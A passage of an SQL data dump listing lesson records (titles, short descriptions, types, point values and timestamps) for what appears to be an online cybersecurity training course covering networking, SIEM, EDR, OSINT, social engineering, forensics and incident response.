(2, 1, 'Understanding Threats and Vulnerabilities', 'Learn the difference between threats, vulnerabilities, and risks. Explore common attack vectors.', 'reading', NULL, 30, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(3, 1, 'Career Paths in Cybersecurity', 'Discover different career paths: SOC Analyst, Penetration Tester, Security Engineer, and more.', 'reading', NULL, 20, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(4, 1, 'Quiz: Cybersecurity Basics', 'Test your knowledge of fundamental cybersecurity concepts.', 'quiz', NULL, 50, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(5, 1, 'Setting Up Your Lab Environment', 'Install VirtualBox and download your first security-focused Linux distribution.', 'challenge', NULL, 100, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(6, 2, 'Navigating the File System', 'Learn cd, ls, pwd commands. Practice moving through directories.', 'challenge', NULL, 40, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(7, 2, 'File Manipulation', 'Master cp, mv, rm, mkdir, touch commands for managing files and directories.', 'challenge', NULL, 40, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(8, 2, 'Understanding Permissions', 'Learn about user, group, and other permissions using chmod and chown.', 'reading', NULL, 50, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(9, 2, 'Searching and Finding Files', 'Use find, locate, and which commands to search for files.', 'challenge', NULL, 40, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(10, 2, 'Text Manipulation with grep', 'Learn to search file contents using grep with regular expressions.', 'challenge', NULL, 50, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(11, 2, 'Process Management', 'Understand ps, top, kill commands for managing running processes.', 'challenge', NULL, 50, 6, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(12, 2, 'Package Management', 'Install and manage software using apt/yum package managers.', 'challenge', NULL, 40, 7, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(22, 4, 'OSI Model Explained', 'Learn the 7 layers of the OSI model and their functions.', 'reading', NULL, 40, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(23, 4, 'TCP/IP Protocol Suite', 'Understand TCP vs UDP, common ports, and the three-way handshake.', 'reading', NULL, 50, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(24, 4, 'IP Addressing and Subnetting', 'Learn IPv4 addressing, subnet masks, and CIDR notation.', 'challenge', NULL, 60, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(25, 4, 'Subnetting Practice', 'Complete subnetting exercises to master network calculations.', 'challenge', NULL, 70, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(26, 4, 'DNS Fundamentals', 'Understand how DNS works, record types (A, AAAA, MX, CNAME), and DNS queries.', 'reading', NULL, 50, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(27, 4, 'DHCP and ARP', 'Learn how DHCP assigns IP addresses and how ARP maps IPs to MAC addresses.', 'reading', NULL, 40, 6, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(28, 4, 'Common Network Protocols', 'Explore HTTP/HTTPS, FTP, SSH, SMTP, and their security implications.', 'reading', NULL, 50, 7, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(30, 4, 'Network Traffic Analysis Challenge', 'Analyze a PCAP file to identify suspicious network activity.', 'challenge', NULL, 100, 9, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(31, 4, 'Quiz: Networking Essentials', 'Test your networking knowledge with a comprehensive quiz.', 'quiz', NULL, 60, 10, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(32, 9, 'Windows File System', NULL, 'reading', NULL, 25, 1, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(33, 9, 'User Account Control', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(34, 9, 'Windows Registry', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(35, 9, 'Active Directory Intro', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(36, 9, 'PowerShell Fundamentals', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(37, 9, 'Windows Event Logs', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(38, 9, 'Group Policy', NULL, 'reading', NULL, 25, 7, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(39, 9, 'Windows Security Tools', NULL, 'reading', NULL, 25, 8, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(40, 10, 'CIA Triad', NULL, 'reading', NULL, 25, 1, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(41, 10, 'Authentication Methods', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(42, 10, 'Authorization', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(43, 10, 'Accounting', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(44, 10, 'Encryption Basics', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(45, 10, 'Hashing vs Encryption', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(46, 10, 'Defense in Depth', NULL, 'reading', NULL, 25, 7, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(47, 10, 'Quiz: Security Principles', NULL, 'reading', NULL, 25, 8, 1, '2025-12-26 02:44:43', '2025-12-26 20:57:55', NULL),
(48, 11, 'Navigating Directories', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(49, 11, 'Reading Files', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(50, 11, 'Host Identity', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(51, 11, 'IP Configuration', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(52, 11, 'Terminating Processes', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(54, 12, 'Anatomy of a Log', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(55, 12, 'SSH Authentication', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(56, 12, 'Web Access Logs', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(57, 12, 'Windows Event Logs', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(58, 12, 'Detecting Web Attacks', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(59, 12, 'Firewall & Network Logs', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(60, 12, 'Command Injection', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(61, 12, 'Advanced Obfuscation', NULL, 'reading', NULL, 30, 8, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(72, 14, 'What is a Proxy?', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(73, 14, 'Burp Suite Basics', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(74, 14, 'Intercepting Requests', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(75, 14, 'Repeater & Decoder', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(76, 14, 'Proxy Chaining & VPNs', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(77, 15, 'IDS vs IPS: Architecture', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(78, 15, 'Detection Methodologies', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(79, 15, 'Network (NIDS) vs Host (HIDS)', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(81, 15, 'Zeek (Bro) Surveillance', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(82, 15, 'Alert Triage & Investigation', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(83, 15, 'Handling False Positives', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(84, 16, 'The Vulnerability Lifecycle', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(85, 16, 'Authenticated vs Unauthenticated', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(86, 16, 'Decoding CVSS Scores', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(87, 16, 'Nessus Operations', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(88, 16, 'Analyzing Scan Reports', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(89, 16, 'Patch Management Strategy', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(90, 16, 'Understanding CVEs', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(91, 16, 'Risk Response Strategies', NULL, 'reading', NULL, 30, 8, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(92, 17, 'DAST Fundamentals', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(93, 17, 'OWASP Top 10 Deep Dive', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(94, 17, 'OWASP ZAP Mastery', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(95, 17, 'Advanced Spidering', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(96, 17, 'Active Scanning Mechanics', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(97, 17, ' Identifying DAST False Positives', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(98, 17, 'Effective Remediation Reporting', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(160, 16, 'Module 16 Final Quiz', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:51:15', NULL),
(181, 18, 'What is OSINT?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(182, 18, 'The Intelligence Cycle', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(183, 18, 'OPSEC & Sock Puppets', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(184, 18, 'Google Dorking Mastery', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(185, 18, 'People & Username Recon', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(186, 18, 'Email & Breach Data', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(187, 18, 'Image Intelligence (IMINT)', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(188, 18, 'Domain & Infrastructure', NULL, 'reading', NULL, 40, 8, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(189, 18, 'Geolocation & Maps', NULL, 'reading', NULL, 40, 9, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(190, 18, 'Module 18 Final Quiz', NULL, 'reading', NULL, 40, 10, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(191, 19, 'Email Anatomy: RFC 5322', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(192, 19, 'Authentication: SPF, DKIM, DMARC', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(193, 19, 'Investigation 1: The CEO Fraud', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(194, 19, 'Investigation 2: Malicious Attachment', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(195, 19, 'Investigation 3: The Credential Harvest', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(196, 19, 'Module 19 Final Quiz', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(201, 20, 'Psychology of Persuasion', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(202, 20, 'Pretexting & Impersonation', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(203, 20, 'Vishing (Voice Phishing)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(204, 20, 'Smishing (SMS Phishing)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(205, 20, 'Physical: Tailgating & Dumpster Diving', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(206, 20, 'Baiting & Quid Pro Quo', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(207, 20, 'Module 20 Final Quiz', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(211, 21, 'Introduction to Virtualization', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(212, 21, 'Hypervisors: Type 1 vs Type 2', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(213, 21, 'Setting Up VirtualBox (Free)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(214, 21, 'Setting Up VMware Workstation', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(215, 21, 'Creating Your First VM (Kali Linux)', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(216, 21, 'Network Modes: NAT, Bridged, Host-Only', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(217, 21, 'Snapshots & Clones (The Safety Net)', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(221, 22, 'What is a SIEM?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(222, 22, 'Log Sources & Ingestion', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(223, 22, 'Normalization & Parsing', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(224, 22, 'Correlation Rules (The Magic)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(225, 22, 'Market Leaders: Splunk vs Sentinel', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(226, 22, 'Open Source: The ELK Stack', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(227, 22, 'Wazuh: The Modern Open SIEM', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(228, 22, 'Final Quiz', NULL, 'reading', NULL, 40, 8, 1, '2025-12-26 02:45:46', '2025-12-26 22:38:12', NULL),
(231, 23, 'Use Case 1: Brute Force Attack (Easy)', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(232, 23, 'Use Case 2: Malware Beaconing (Easy)', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(233, 23, 'Use Case 3: Impossible Travel (Medium)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(234, 23, 'Use Case 4: Privilege Escalation (Medium)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(235, 23, 'Use Case 5: DNS Tunneling (Hard)', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(236, 23, 'Final Quiz', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:43:08', NULL),
(241, 24, 'What is EDR?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(242, 24, 'EDR vs Antivirus', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(243, 24, 'The Process Tree (Deep Dive)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(244, 24, 'Reading Process Ancestry', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(245, 24, 'Suspicious Parent-Child Relationships', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(246, 24, 'EDR Market Leaders', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(247, 24, 'Final Quiz', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(251, 25, 'IDS Types: NIDS vs HIDS', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(252, 25, 'Signature vs Anomaly Detection', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(253, 25, 'Snort: The Open-Source IDS', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(254, 25, 'Suricata: The Modern Alternative', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(255, 25, 'Analyzing IDS Alerts', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(256, 25, 'Final Quiz', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(261, 26, 'Malware Categories', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(262, 26, 'Static vs Dynamic Analysis', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(263, 26, 'Setting Up a Safe Lab', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(264, 26, 'Static Analysis Tools', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(265, 26, 'Dynamic Analysis (Sandboxing)', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(266, 26, 'Identifying IOCs from Malware', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(267, 26, 'Final Quiz', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(271, 27, 'What is Incident Response?', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(272, 27, 'The IR Lifecycle (NIST)', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(273, 27, 'Phase 1: Preparation', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(274, 27, 'Phase 2: Detection & Analysis', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(275, 27, 'Phase 3: Containment', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(276, 27, 'Phase 4: Eradication & Recovery', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(277, 27, 'Phase 5: Post-Incident Activity', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(278, 27, 'Final Quiz', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(281, 28, 'What is Digital Forensics?', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(282, 28, 'The Forensic Process', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(283, 28, 'Evidence Handling & Chain of Custody', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(284, 28, 'Disk Imaging & Acquisition', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(285, 28, 'File System Analysis (NTFS/ext4)', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(286, 28, 'Windows Artifacts', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(287, 28, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(291, 29, 'Why Analyze Network Traffic?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(292, 29, 'Packet Capture Fundamentals', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(293, 29, 'Wireshark Essentials', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(294, 29, 'Analyzing TCP/HTTP Traffic', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(295, 29, 'Detecting Malicious Traffic', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(296, 29, 'Zeek (Bro) for Network Logs', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(297, 29, 'Final Quiz', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(301, 30, 'What is Threat Hunting?', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(302, 30, 'Hunting vs Detection', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(303, 30, 'The Hunting Loop', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(304, 30, 'Hypothesis-Driven Hunting', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(305, 30, 'Data Sources for Hunting', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(306, 30, 'Hunting Techniques', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(307, 30, 'Final Quiz', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(311, 31, 'What is MITRE ATT&CK?', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(312, 31, 'Tactics: The \"Why\"', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(313, 31, 'Techniques: The \"How\"', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(314, 31, 'Navigating the Matrix', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(315, 31, 'Using ATT&CK for Defense', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(316, 31, 'Final Quiz', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(321, 32, 'Cloud Service Models (IaaS/PaaS/SaaS)', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(322, 32, 'Shared Responsibility Model', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(323, 32, 'AWS Security Fundamentals', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(324, 32, 'Azure Security Fundamentals', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(325, 32, 'Cloud Misconfigurations', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(326, 32, 'Final Quiz', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(331, 33, 'Why Automate Security?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(332, 33, 'SOAR Platforms Overview', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(333, 33, 'Playbook Design Principles', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(334, 33, 'Common Automation Use Cases', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(335, 33, 'Python for Security Automation', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(336, 33, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(341, 34, 'Why Documentation Matters', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(342, 34, 'Incident Timelines', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(343, 34, 'Writing Effective Reports', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(344, 34, 'Executive Summaries', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(345, 34, 'Metrics and KPIs', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(346, 34, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(349, 49, 'Understanding EDR Telemetry', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:30', '2026-03-12 21:42:07', 237),
